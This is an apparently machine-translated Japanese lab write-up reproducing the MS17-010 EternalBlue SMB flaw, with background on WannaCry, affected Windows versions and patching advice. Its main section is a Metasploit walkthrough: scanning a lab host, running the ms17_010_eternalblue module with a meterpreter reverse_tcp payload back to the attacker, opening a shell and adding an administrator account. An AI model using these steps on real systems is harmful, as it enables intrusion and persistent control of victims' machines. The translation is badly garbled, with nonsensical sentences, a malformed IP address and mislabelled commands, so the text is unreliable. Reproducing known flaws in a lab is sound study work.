Ms17-010永遠ブルーの脆弱性の再現
0x00が脆弱性を紹介します
永遠ブルーは2017年4月14日、「永遠ブルー」の最高機関システムを得ることができますWindowsのSMBシステムの脆弱性を利用しての夜を指し
無法の要素の変換により、2017年5月12日「永遠ブルー」恐喝ウイルス生産wannacry複数の大学のキャンパスネットワークでは、大規模な企業ネットワークや政府機関、プライベートネットワークのトリックで、恐喝賃金の高い身代金は、ファイルを復元復号化します。
0x01の脆弱性原理
永遠ブルーフォーミュラワン組織は、その攻撃で抜け穴は、ターゲットシステム上の攻撃者が任意のコードを実行できる可能性がSMBサービスの脆弱性のためのフレームワークを利用しています。
0x02のバージョンに影響します
Windowsのの現在知られている影響を受けるバージョンは、これらに限定されないが:
WindowsNTは、
Windows2000の、
Windows XPでは、
Windows 2003では、
Windows Vistaでは、
Windows 7は、
Windows 8の、
Windows 2008の、
Windows 2008のR2、
Windows Serverの2012 SP0。
0x03の脆弱性補修
いつもではない添付ファイルを開くドキュメント、RTFおよびその他のサフィックス;イントラネットMicrosoftは2017年3月14日にリリースMS17-010のパッチの修正の脆弱性「永遠ブルー」攻撃、Windowsシステムのパッチを更新してくださいましたパッチがインストールされた後、必ずパスワードの変更は、ネットワーク操作を完了すると、あなたはバグ修正「永遠ブルー」ツールのバグ修正をダウンロードすることができ、同じアカウントを使用して存在し、コンピュータではなくメイクの上、できるだけ早くマシンコードの場合にパスワードを変更してください
0x04の環境の脆弱性
攻撃:カリ-Linuxの-2019.4-vmwareの -amd64(IP:192.168.139.153)
ドローン:Windows 7のX64(IP:192.168.139.140 )
0x05の再現性のある脆弱性
[msfconsole] ----- MSFを開始
[serarch ms17_010] ----テンプレートライブラリを表示し
、[利用補助/スキャナ/ SMB / smb_ms17_010] - 抜け穴がある場合スキャンホストは見に
セット- [設定のrhosts 192.1683.139.140は]アドレスIPスキャンホスト
[活用]は-攻撃し始めた
[使用は、Windows / SMB / /活用 - ms17_010_eternalblue] 攻撃モジュールへの使用を
[表示オプション]を----閲覧パラメータを設定する必要がある
[設定のrhosts 192.168.139.140] -攻撃されたホストを設定しますIPアドレス
[セットlhostsは192.168.139.153] -攻撃者のIPアドレスを設定
[設定のスレッド512] -攻撃者のIPアドレスを設定し
、[設定ペイロードの窓/ x64の/ meterpreter / reverse_tcp] - バウンスにマシンを設定する
[悪用] -攻撃を始めます
[シェル]
[whami]
[システム情報]
[IPCONFIG]
次に、あなたは、スーパー管理者グループへのパスワードの追加]を変更するためにユーザーを追加することができます